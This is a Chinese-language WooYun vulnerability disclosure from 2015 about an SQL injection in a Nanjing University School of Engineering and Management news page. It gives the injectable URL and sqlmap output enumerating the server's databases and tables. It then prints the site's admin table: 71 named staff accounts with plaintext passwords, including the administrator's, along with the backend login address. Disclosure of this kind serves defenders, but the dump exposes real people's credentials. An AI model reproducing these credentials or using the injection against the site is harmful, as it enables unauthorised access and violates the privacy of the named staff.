当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0114938

漏洞标题:南京大学工程管理学院存在SQL注入一枚(泄露数据库信息)

相关厂商:nju.edu.cn

漏洞作者: 尊-折戟

提交时间:2015-05-19 16:04

修复时间:2015-07-03 16:28

公开时间:2015-07-03 16:28

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:7

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-19: 细节已通知厂商并且等待厂商处理中
2015-05-19: 厂商已经确认,细节仅向厂商公开
2015-05-29: 细节向核心白帽子及相关领域专家公开
2015-06-08: 细节向普通白帽子公开
2015-06-18: 细节向实习白帽子公开
2015-07-03: 细节向公众公开

简要描述:

南京大学工程管理学院sql注入,泄露部分人员信息

详细说明:

注入点:

http://sme.nju.edu.cn/content/news_detail.php?id=89


V[3K(D%C[O]~H9J0Z)TG$JI.jpg


)A~(40@AT76XV@(3Y}8SONN.jpg


ZN$EF5Q9~W3JU~FUT_7DLLF.jpg


直接用sqlmap跑一下,跑出服务器系统和权限

YE133`6TEADQEJD$HK_SLA2.jpg


没想到权限这么多!
跑下数据库和表名如下:

N3]%6`8HBJ8NNA]A3V}L}`K.png


---
[13:41:47] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.4, PHP 5.4.19
back-end DBMS: MySQL 5.0.12
[13:41:47] [INFO] fetching database names
[13:41:47] [INFO] the SQL query used returns 9 entries
[13:41:47] [INFO] resumed: information_schema
[13:41:47] [INFO] resumed: cdcol
[13:41:47] [INFO] resumed: mysql
[13:41:47] [INFO] resumed: performance_schema
[13:41:47] [INFO] resumed: phpmyadmin
[13:41:47] [INFO] resumed: smee
[13:41:47] [INFO] resumed: test
[13:41:47] [INFO] resumed: webauth
[13:41:48] [INFO] resumed: yuhonghai
[13:41:48] [INFO] fetching tables for databases: 'cdcol, informati
ma, phpmyadmin, smee, test, webauth, yuhonghai'
[13:41:48] [INFO] the SQL query used returns 154 entries
Database: cdcol
[1 table]
+----------------------------------------------+
| cds |
+----------------------------------------------+
Database: phpmyadmin
[12 tables]
+----------------------------------------------+
| pma_bookmark |
| pma_column_info |
| pma_designer_coords |
| pma_history |
| pma_pdf_pages |
| pma_recent |
| pma_relation |
| pma_table_coords |
| pma_table_info |
| pma_table_uiprefs |
| pma_tracking |
| pma_userconfig |
+----------------------------------------------+
Database: performance_schema
[17 tables]
+----------------------------------------------+
| cond_instances |
| events_waits_current |
| events_waits_history |
| events_waits_history_long |
| events_waits_summary_by_instance |
| events_waits_summary_by_thread_by_event_name |
| events_waits_summary_global_by_event_name |
| file_instances |
| file_summary_by_event_name |
| file_summary_by_instance |
| mutex_instances |
| performance_timers |
| rwlock_instances |
| setup_consumers |
| setup_instruments |
| setup_timers |
| threads |
+----------------------------------------------+
Database: smee
[26 tables]
+----------------------------------------------+
| admin |
| t_basic_info |
| t_category |
| t_cbzz |
| t_ddsm |
| t_fblw |
| t_gllt |
| t_hjqk |
| t_hzjl |
| t_jrlt |
| t_jrlt_bak |
| t_jszz |
| t_jxkc |
| t_kyxm |
| t_kyxm_gj |
| t_kyxm_hxyb |
| t_kyxm_hxzd |
| t_kyxm_sbj |
| t_news |
| t_rych |
| t_shzw |
| t_xydt |
| t_yjfx |
| t_zlfm |
| t_zlyl |
| t_zwmjjt |
+----------------------------------------------+
Database: yuhonghai
[32 tables]
+----------------------------------------------+
| user |
| admin |
| football |
| kejian |
| news |
| notice |
| report |
| t_basic_info |
| t_category |
| t_cbzz |
| t_ddsm |
| t_fblw |
| t_gllt |
| t_hjqk |
| t_hzjl |
| t_jrlt |
| t_jrlt_bak |
| t_jszz |
| t_jxkc |
| t_kyxm |
| t_kyxm_gj |
| t_kyxm_hxyb |
| t_kyxm_hxzd |
| t_kyxm_sbj |
| t_news |
| t_rych |
| t_shzw |
| t_xydt |
| t_yjfx |
| t_zlfm |
| t_zlyl |
| t_zwmjjt |
+----------------------------------------------+
Database: webauth
[1 table]
+----------------------------------------------+
| user_pwd |
+----------------------------------------------+
Database: mysql
[24 tables]
+----------------------------------------------+
| user |
| columns_priv |
| db |
| event |
| func |
| general_log |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| ndb_binlog_index |
| plugin |
| proc |
| procs_priv |
| proxies_priv |
| servers |
| slow_log |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
+----------------------------------------------+
Database: test
[1 table]
+----------------------------------------------+
| t_news |
+----------------------------------------------+
Database: information_schema
[40 tables]
+----------------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| INNODB_BUFFER_PAGE |
| INNODB_BUFFER_PAGE_LRU |
| INNODB_BUFFER_POOL_STATS |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_RESET |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_TRX |
| KEY_COLUMN_USAGE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+----------------------------------------------+


查看一下信息,发现。。。

QGES9TW_8}2M1VG%WG~VO1X.png


Database: smee
Table: admin
[71 entries]
+--------------------+-----------------+
| user_name | user_pass |
+--------------------+-----------------+
| admin | novaadminnju520 |
| 陈春林 | 000000 |
| 陈国华 | 0 |
| 陈强 | 0 |
| 陈莹 | 0 |
| 程书萍 | 0 |
| 高俊 | 0 |
| 郭亚敏 | 0 |
| 黄奇 | 0 |
| 蒋军锋 | 0 |
| 焦小澄 | 0 |
| 宋跃江 | 0 |
| 许国良 | 0 |
| 瞿慧 | 358358 |
| 李民 | 0 |
| 李迁 | 0000 |
| 李心丹 | 83597503 |
| 刘海飞 | 0 |
| 刘慧敏 | 0 |
| 路元刚 | 83597544 |
| 王峰 | 83595506 |
| 王顺 | 0 |
| 肖斌卿 | 101932 |
| 肖条军 | 7371 |
| 徐薇 | 97123070 |
| 徐伟弘 | 0 |
| 杨佩 | 0 |
| 张兵 | 0 |
| 周晶 | 0 |
| 周跃进 | 406806 |
| 周运森 | 0 |
| 朱洪亮 | 0 |
| 朱华桂 | 726082 |
| 朱美琳 | 0 |
| 朱庆华 | 0 |
| 沈厚才 | 86205844 |
| 周献中 | 11xy69mx54zx |
| 盛昭瀚 | 0 |
| 李敬泉 | 0000 |
| 徐峰 | 000000 |
| 陈星光 | 0 |
| 李华雄 | 218000 |
| 朱张青 | 0 |
| 赵佳宝 | 0 |
| 杜建国 | 0 |
| 鲍晓毅 | 0 |
| 俞红海 | 789456123 |
| 李娟 | 0000 |
| 李维 | 0000 |
| 李密 | 0 |
| 刘烨 | 0 |
| 徐敏 | 0 |
| Hongjun Yan(炎宏军) | 0 |
| Jeff L.Hong(洪流) | 0 |
| 张旭苹 | 204001 |
| 毕军 | 0 |
| 方立兵 | fanglibing |
| 张益昕 | cityhunter |
| Liu Li | 111111 |
| Hans Jürgen Kracht | hjkracht |
| 陈彩华 | 000000 |
| 杨学伟 | a266456a |
| 唐迪明 | 83597501 |
| 朱海滨 | zhb63322 |
| 葛敏 | 0619 |
| 王博 | 0000 |
| 张莲民 | 0000 |
| 林良才 | 000000 |
| 徐红利 | hlxu46575719 |
| 李东昕 | lee820109 |
| 章嘉丽 | 000000 |
+--------------------+-----------------+


泄露如此严重。。。
最后在查看一下用户

L9Q5Q3[3888M9_R}~P%`EQ3.png


5S}_$KEZ$KXJG%ELLP(DLY0.png


这是后台地址:

http://sme.nju.edu.cn/content/admin/sem_user/admin_php/Login.php


我怎么搞,不过可以进的,但还是不要破坏教学系统最好吧。。
就到这了!

漏洞证明:

V[3K(D%C[O]~H9J0Z)TG$JI.jpg


)A~(40@AT76XV@(3Y}8SONN.jpg


ZN$EF5Q9~W3JU~FUT_7DLLF.jpg


YE133`6TEADQEJD$HK_SLA2.jpg


N3]%6`8HBJ8NNA]A3V}L}`K.png

修复方案:

过滤关键字,用安全狗拦截特殊字符!

版权声明:转载请注明来源 尊-折戟@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-05-19 16:27

厂商回复:

我们会通知相关院系进行处理。

最新状态:

暂无


漏洞评价:

评论

  1. 2015-05-20 18:30 | Eric_zZ ( 路人 | Rank:8 漏洞数:5 | Just try it!)

    屌屌屌。。。